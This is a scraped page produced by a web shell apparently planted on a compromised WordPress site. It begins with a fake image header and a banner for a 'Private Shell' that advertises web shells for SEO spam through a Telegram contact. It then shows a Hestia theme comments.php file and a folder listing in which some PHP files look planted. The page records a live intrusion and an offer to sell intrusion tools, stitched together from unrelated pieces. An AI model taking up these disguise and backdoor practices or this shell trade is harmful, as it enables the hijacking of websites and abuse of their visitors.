����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template for displaying comments
*
* The area of the page that contains both current comments
* and the comment form.
*
* @package Hestia
* @since Hestia 1.0
*/
/*
* If the current post is protected by a password and
* the visitor has not yet entered the password we will
* return early without loading the comments.
*/
if ( post_password_required() ) {
return;
}
?>
<div id="comments" class="section section-comments">
<div class="row">
<div class="col-md-12">
<div class="media-area">
<h3 class="hestia-title text-center">
<?php
$comments_number = get_comments_number();
if ( 0 !== $comments_number ) {
if ( 1 === $comments_number ) {
/* translators: %s: post title */
_x( 'One comment', 'comments title', 'hestia' );
} else {
printf(
/* translators: 1: number of comments, 2: post title */
_nx(
'%1$s Comment',
'%1$s Comments',
$comments_number,
'comments title',
'hestia'
),
number_format_i18n( $comments_number )
);
}
}
?>
</h3>
<?php
wp_list_comments( 'type=comment&callback=hestia_comments_list' );
wp_list_comments( 'type=pings&callback=hestia_comments_list' );
$pages = paginate_comments_links(
array(
'echo' => false,
'type' => 'array',
)
);
if ( is_array( $pages ) ) {
echo '<div class="text-center"><ul class="nav pagination pagination-primary">';
foreach ( $pages as $page ) {
echo '<li>' . $page . '</li>';
}
echo '</ul></div>';
}
?>
</div>
<div class="media-body">
<?php
ob_start();
comment_form( hestia_comments_template() );
echo str_replace( '<form', '<form autocomplete="off" ', ob_get_clean() );
?>
<?php if ( ! comments_open() && get_comments_number() ) : ?>
<?php if ( is_single() ) : ?>
<h4 class="no-comments hestia-title text-center"><?php esc_html_e( 'Comments are closed.', 'hestia' ); ?></h4>
<?php endif; ?>
<?php endif; ?>
</div>
</div>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| page-templates | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vendor | Folder | 0755 |
|
|
| CHANGELOG.md | File | 56.87 KB | 0644 |
|
| archive-stack.php | File | 181.05 KB | 0644 |
|
| archive.php | File | 1.64 KB | 0644 |
|
| attachment.php | File | 1.98 KB | 0644 |
|
| comments.php | File | 2.06 KB | 0644 |
|
| docker-compose.ci.yml | File | 1.23 KB | 0644 |
|
| editor-style.min.css | File | 18.51 KB | 0644 |
|
| front-page.php | File | 1.11 KB | 0644 |
|
| offline.php | File | 164 B | 0644 |
|
| sidebar-woocommerce-boolean.php | File | 26.56 KB | 0644 |
|
| sidebar-woocommerce.php | File | 798 B | 0644 |
|
| sidebar.php | File | 724 B | 0644 |
|
| single-jetpack-portfolio.php | File | 688 B | 0644 |
|
| style.css | File | 176.08 KB | 0644 |
|
| toolset-config.json | File | 7 KB | 0644 |
|